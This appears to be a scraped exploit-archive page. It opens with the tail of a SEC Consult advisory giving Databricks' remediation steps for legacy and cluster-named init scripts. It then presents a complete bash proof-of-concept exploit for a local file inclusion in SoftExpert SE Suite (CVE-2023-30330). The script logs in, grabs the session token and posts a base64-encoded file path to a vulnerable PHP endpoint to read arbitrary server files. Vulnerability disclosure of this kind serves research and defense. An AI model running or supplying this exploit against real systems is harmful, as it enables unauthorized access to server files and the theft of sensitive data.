/>---------<br />Databricks disabled the creation of new workspaces using the deprecated init<br />script types and added support for initializing scripts in Workspace Files.<br /><br />The following solution for end users has been provided by the vendor:<br /><br />Legacy global init scripts:<br /><br />* Immediately disable legacy global init scripts (AWS [1] | Azure [2] ) if not actively<br /> used: it's a safe, easy, and immediate step to close this potential attack vector.<br /><br />* Customers with legacy global init scripts deployed should first migrate legacy<br /> scripts to the new global init script type (this notebook [3] can be used to automate<br /> the migration work) and, after this migration step, proceed to disable the legacy<br /> version as indicated in the previous step.<br /><br />[1] https://docs.databricks.com/clusters/init-scripts.html#migrate-legacy-scripts<br />[2] https://learn.microsoft.com/en-us/azure/databricks/clusters/init-scripts#migrate-legacy-scripts<br />[3] https://kb.databricks.com/legacy-global-init-script-migration-notebook<br /><br /><br />Cluster-named init scripts:<br /><br />* Cluster-named init scripts are similarly affected by the issue and are also deprecated:<br /> customers still using this type of init scripts should migrate them to cluster-scoped<br /> scripts and make sure that the scripts are stored in the new workspace files storage<br /> location (AWS [4] | Azure [5] | GCP [6]). This notebook [7] can be used to automate the migration work.<br /><br /><br />Cluster-scoped init scripts:<br /><br />* Existing cluster-scoped init scripts stored on DBFS should be migrated to the alternative,<br /> safer workspace files location (AWS [4] | Azure [5] | GCP [6] ). Going forward the default location of<br /> cluster-scoped init scripts in the product UI will be workspace files.<br /><br />[4] https://docs.databricks.com/files/workspace.html<br />[5] https://learn.microsoft.com/en-us/azure/databricks/files/workspace<br />[6] https://docs.gcp.databricks.com/files/workspace.html<br />[7] https://kb.databricks.com/cluster-named-init-script-migration-notebook<br /><br /><br />Legacy global init scripts and cluster-named init scripts will be disabled for all workspaces<br />on Sept 1, 2023. They will not function after this date.<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br /><br />SEC Consult is part of Eviden, an atos business<br />Europe | Asia | North America<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, part<br />of Eviden, an atos business. It ensures the continued knowledge gain of SEC<br />Consult in the field of network and application security to stay ahead of the<br />attacker. The SEC Consult Vulnerability Lab supports high-quality penetration<br />testing and the evaluation of new offensive and defensive technologies for our<br />customers. Hence our customers obtain the most current information about<br />vulnerabilities and valid recommendation about the risk profile of new<br />technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: http://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF Florian Roth, Marius Bartholdy / @2023<br /><br /></code></pre>
<pre><code># Exploit Title: SoftExpert (SE) Suite v2.1.3 - Local File Inclusion<br /># Date: 27-04-2023<br /># Exploit Author: Felipe Alcantara (Filiplain)<br /># Vendor Homepage: https://www.softexpert.com/<br /># Version: 2.0 < 2.1.3<br /># Tested on: Kali Linux<br /># CVE : CVE-2023-30330<br /># SE Suite versions tested: 2.0.15.31, 2.0.15.115<br /><br /># https://github.com/Filiplain/LFI-to-RCE-SE-Suite-2.0<br /># https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-30330<br /><br /><br />#!/bin/bash<br /><br /># Usage: ./lfi-poc.sh <domain> <username> <password> <File Path> <br /><br />target=$1<br />u=$2<br />p=$3<br />file=$(echo -n "$4"|base64 -w 0)<br /><br />end="\033[0m\e[0m"<br />red="\e[0;31m\033[1m"<br />blue="\e[0;34m\033[1m"<br /><br />echo -e "\n$4 : $file\n"<br /><br />echo -e "${blue}\nGETTING SESSION COOKIE${end}"<br />cookie=$(curl -i -s -k -X $'POST' \<br /> -H "Host: $target" -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'X-Requested-With: XMLHttpRequest' -H $'Content-Length: 213' -H "Origin: https://$target" -H "Referer: https://$target/softexpert/login?page=home" -H $'Sec-Fetch-Dest: empty' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Site: same-origin' -H $'Te: trailers' -H $'Connection: close' \<br /> -b $'language=1; _ga=GA1.3.151610227.1675447324; SEFGLANGUAGE=1; mode=deploy' \<br /> --data-binary "json=%7B%22AuthenticationParameter%22%3A%7B%22language%22%3A3%2C%22hashGUID%22%3Anull%2C%22domain%22%3A%22%22%2C%22accessType%22%3A%22DESKTOP%22%2C%22login%22%3A%22$u%22%2C%22password%22%3A%22$p%22%7D%7D" \<br /> "https://$target/softexpert/selogin"|grep se-authentication-token |grep "=" |cut -d ';' -f 1|sort -u|cut -d "=" -f 2)<br /><br />echo "cookie: $cookie"<br /><br />function LFI () {<br /><br />curl -s -k -X $'POST' \<br /> -H "Host: $target" -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0" -H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Content-Type: application/x-www-form-urlencoded' -H "Origin: https://$target" -H "Referer: https://$target/softexpert/workspace?page=home" -H 'Upgrade-Insecure-Requests: 1' -H 'Sec-Fetch-Dest: document' -H 'Sec-Fetch-Mode: navigate' -H 'Sec-Fetch-Site: same-origin' -H 'Te: trailers' -H 'Connection: close' \<br /> -b "se-authentication-token=$cookie; _ga=GA1.3.151610227.1675447324; SEFGLANGUAGE=1; mode=deploy" \<br /> --data-binary "action=4&managerName=lol&managerPath=$file&className=ZG9jX2RvY3VtZW50X2FkdmFuY2VkX2dyb3VwX2ZpbHRlcg%3D%3D&instantiate=false&loadJquery=false" \<br /> "https://$target/se/v42300/generic/gn_defaultframe/2.0/defaultframe_filter.php"<br /><br />}<br /><br />echo -e "${blue}\nExploiting LFI:${end}"<br />LFI<br /><br />function logout () {<br />curl -i -s -k -X $'POST' \<br /> -H "Host: $target" -H $'Content-Length: 0' -H $'Sec-Ch-Ua: \"Not_A Brand\";v=\"99\", \"Google Chrome\";v=\"109\", \"Chromium\";v=\"109\"' -H $'Accept: application/json, text/javascript, */*; q=0.01' -H $'X-Requested-With: XMLHttpRequest' -H $'Sec-Ch-Ua-Mobile: ?0' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36' -H $'Sec-Ch-Ua-Platform: \"Linux\"' -H "Origin: https://$target" -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Dest: empty' -H "Referer: https://$target/softexpert/workspace?page=home" -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US,en;q=0.9' -H $'Connection: close' \<br /> -b "se-authentication-token=$cookie; language=1; _ga=GA1.3.1890963078.1675081150; twk_uuid_5db840c5e4c2fa4b6bd8f89a=%7B%22uuid%22%3A%221.bJmDVb5PBlMumGNq2QO9gxk5hjdc6sp2pgENmao2hxHntg00r0qllmuXqCXTWG9uYLT1GkRDFuPY4ir63UIEJEXSS0pIJi8YlIvsB4edfrG1RTcS3CPr58feQBNf1%22%2C%22version%22%3A3%2C%22domain%22%3A%22$target%22%2C%22ts%22%3A1675081174571%7D; mode=deploy" \<br /> "https://$target/softexpert/selogout"<br />}<br /><br />echo -e "${blue}\nLogging out${end}"<br />logout >/dev/null<br />echo -e "\n\nDone!"<br /><br /><br /></code></pre>